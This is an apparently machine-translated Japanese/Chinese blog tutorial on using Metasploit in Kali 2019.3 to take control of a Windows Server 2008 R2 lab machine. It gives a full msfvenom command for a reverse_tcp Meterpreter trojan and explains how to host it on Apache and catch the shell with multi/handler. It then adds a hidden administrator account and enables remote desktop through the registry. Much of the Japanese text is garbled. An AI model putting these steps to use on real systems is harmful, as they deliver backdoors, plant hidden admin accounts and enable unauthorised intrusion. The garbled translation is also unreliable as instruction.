MetasploitのをKali2019.3簡単な使用

、カーリーとMetasploitの

  カリ侵入テストツールの多くを統合デジタルフォレンジックベースのシステム、のDebin、その前身はBT5 R3(BrackTrack)であり、情報収集に重要な役割を果たしています。

  Metasploitのは、非常に攻撃者の侵入の効率を向上させ、ツールの利用であり、Rubyの開発者を使用して、ツールに道を非常に使いやすい:端末入力msfconsole、MSFは、データベースを開くためにMSFを使用する前に、PostgreSQLデータベースに依存しています

 

第二に、Metasploitのカリの使用はトロイの木馬、Windowsのコントロールシステムを生成します

攻撃者:カーリー2019.3

ドローン:のWindows Server 2008 R2

まず、2つのシステム間でお互いにpingを実行できることを確認します

2.生産トロイの木馬、攻撃者の端末操作

1 msfvenom -p窓/ meterpreter / reverse_tcp lhost =カーリーのIP lportは= 5555 -f EXE> /root/Desktop/evilshell.exe 
2 -pパラメータの後にペイロード(キャリア)に追いつくためにした後、攻撃が成功すると、何もやる
3 lhostをIPリスニング続く
リスニングポートに続く4 lportは
、バックドアが続くタイプ5 -fをファイルを生成します

  • あなたは中国のカーリーをインストールする場合は、デスクトップのデスクトップに置きます

/ var / www / htmlと設定にコピー3.トロイの木馬ファイルevilshell.exe、htmlディレクトリ内のファイルの残りの部分を削除し、Apacheサービス開きます(これはトロイの木馬のファイルを提供することを目的とし、プラットフォームをダウンロードすることができます)

1つのCP evilshell.exeの/ var / www /ののhtml ファイルのコピーは、トロイの木馬
2のrm -f index.htmlを削除したindex.html 
。3 RM-debian.html -f insex.nginxのindex.htmlを削除します

4.サイトにアクセスするためのドローンブラウザをオンにします。http://カーリーのIPを、およびトロイの木馬のファイルをダウンロードし、私はあなたのデスクトップにダウンロードした、操作しやすいです

5.オープンサービスPostgreSQLは、PostgreSQLのポート番号が5432、上の(略語msfconsole)MSFであります

サービスのPostgreSQLの状態を表示するには、1つの/etc/init.d/postgresqlステータス
2は、PostgreSQLサービスを開くために開始/etc/init.d/postgresql 
3 netstatの-ntulpビューポート
4 msfconsoleオープンMSFを

  • Metasploitのv5.0.41-devのバージョン
  • などの特定のサービス、プラットフォーム、システム、のために使用され搾取、攻撃ツールを利用
  • ペイロードは、攻撃が成功した操作のペイロードによって運営されたものの後に負荷キャリアを攻撃します

6.ロードエクスプロイトとペイロード、モジュールパラメータを設定する参照

1 msf5>使用エクスプロイト/マルチ/ハンドラの選択が悪用
2 msf5は(マルチ/ハンドラ)> SETペイロードのWindows / Meterpreter / reverse_tcp提供ペイロードを利用する
。必要な3つのビューの表示オプションの設定パラメータ
  • 注意:ここでのパスは、トロイの木馬ペイロードを生成するために上記と一致しています

7.根据上图的需求设置lhost和lport,这里的lhost和lport要和上面生产木马的命令中的lhost和lport一致

1 set lhost kali的IP  设置监听地址
2 set lport 5555  设置监听端口
3 run 或者exploit  运行攻击模块

8.在靶机中双击evilshell.exe(这一步是在靶机中诱导用户点击木马程序,也叫社会工程学攻击),这样在攻击者这里就可以得到靶机的shell(meterpreter)

1 shell  获取目标主机shell
2 ifconfig  测试是否能用

  •  windows环境下中文乱码的解决办法:chcp 437

9.在靶机里加入一个隐藏用户(隐藏用户后面加$),提升隐藏用户的权限,方便我们后续的操作测试

1 net user host$ /add  添加隐藏用户host$
2 net user  查看用户
3 net user host$ 密码  为host$用户设置密码
4 net localgroup administrators host$ /add  将host$用户加入到管理员组中,从而提升权限
5 net user host$  查看host$用户信息

10.新开一个终端,使用远程桌面连接的靶机,进行操作

rdesktop 靶机的IP  使用远程桌面连接靶机

  •  如上图所示,连接失败

解决方法:

  方法1:打开上一个终端,开启2003终端服务,查看远程协助的端口是否开启

1 REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f  开启终端服务
2 netstat -ano|finder 3389  查看3389端口

  方法2:打开控制面版-->系统-->远程设置,操作如图所示

  •  重新连接靶机,连接成功,进入以下界面,是用隐藏用户登录靶机

 11.打开靶机的dos命令窗口,若无法在开始中找到dos命令窗口,则按键盘上的开始键+R,在打开的运行中输入cmd,即开启dos命令窗口,添加一个新用户进行测试,添加成功证明渗透成功!

  •  如图所示,拒绝访问

解决方法:在路径中C:\Windows\system32查找cmd.exe,右键cmd.exe,选择以管理员身份运行

 

おすすめ

転載: www.cnblogs.com/zhanghaozsnow/p/11575263.html